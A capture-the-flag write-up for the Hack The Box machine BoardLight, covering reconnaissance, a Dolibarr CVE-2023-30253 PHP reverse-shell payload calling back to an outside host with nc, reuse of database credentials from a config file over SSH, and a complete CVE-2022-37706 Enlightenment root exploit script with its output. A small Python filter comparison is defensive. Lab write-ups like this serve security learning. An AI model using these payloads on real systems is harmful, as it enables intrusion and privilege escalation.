htb boardlight
Information Gathering
# Nmap 7.98 scan initiated Wed Dec 31 20:29:46 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.11
Nmap scan report for 10.10.11.11
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Uptime guess: 42.763 days (since Wed Nov 19 02:11:48 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 31 20:30:03 2025 -- 1 IP address (1 host up) scanned in 16.57 seconds
Vulnerability Analysis
Browsing the site reveals the hostname board.htb.
Since the web content is static, look for vhosts:
➜ BoardLight ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://board.htb/ -H "Host: FUZZ.board.htb" -fw 6243
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 268ms]
Dolibarr 17.0.0 → CVE-2023-30253
Exploitation (User Flag)
Trying the credentials admin:admin grants access.
<?PHP system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.5 4444 > /tmp/f");?>
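The upper-case `<?PHP` open tag above is what makes CVE-2023-30253 work: a filter that looks for the lowercase string `<?php` misses it, while PHP's lexer accepts the tag case-insensitively. As an added illustration (not Dolibarr's code; the filter functions and sample inputs are constructed here), the naive check beside a case-insensitive one:

```python
import re

# Constructed samples of content submitted through a CMS page editor.
# The upper-case open tag mirrors the bypass shown in the writeup.
SAMPLE_LOWER = '<p>hello</p><?php echo "x"; ?>'
SAMPLE_UPPER = '<p>hello</p><?PHP echo "x"; ?>'
SAMPLE_SHORT = '<p>hello</p><?= "x" ?>'
SAMPLE_CLEAN = '<p>hello</p><?xml version="1.0"?>'


def naive_contains_php(content: str) -> bool:
    """Case-sensitive check of the kind the CVE bypassed (illustrative only).

    It flags "<?php" but not "<?PHP", although PHP executes both.
    """
    return '<?php' in content


def hardened_contains_php(content: str) -> bool:
    """Case-insensitive check for a PHP open tag.

    PHP's lexer matches "<?php" regardless of case and also accepts the
    "<?=" echo tag, so the filter must cover both. A processing instruction
    such as "<?xml" is not a PHP tag and is left alone.
    """
    return re.search(r'<\?(?:php\b|=)', content, re.IGNORECASE) is not None


def audit(samples: dict) -> dict:
    """Run both checks over named samples; returns {name: (naive, hardened)}."""
    return {name: (naive_contains_php(c), hardened_contains_php(c))
            for name, c in samples.items()}


if __name__ == "__main__":
    results = audit({"lower": SAMPLE_LOWER, "upper": SAMPLE_UPPER,
                     "short": SAMPLE_SHORT, "clean": SAMPLE_CLEAN})
    for name, (naive, hardened) in results.items():
        print(f"{name:6} naive={naive!s:5} hardened={hardened}")
```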
Once inside:
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ ss -tln
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 511 *:80 *:*
# the database is listening (on localhost only)
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ less conf.php
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';
We see that the home directory contains the user larissa.
Try an SSH connection:
➜ BoardLight ssh larissa@board.htb
# enter the password serverfun2$2023!!
and we get a shell.
Privilege Escalation (Root Flag)
larissa@boardlight:~$ find / -perm -4000 2>/dev/null
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
larissa@boardlight:~$ enlightenment --version
Version: 0.23.1
A search turns up CVE-2022-37706.
#!/bin/bash
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
larissa@boardlight:/tmp$ bash exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
Lessons Learned
When you find database credentials, try them over SSH first instead of going straight into the database to look for hashes.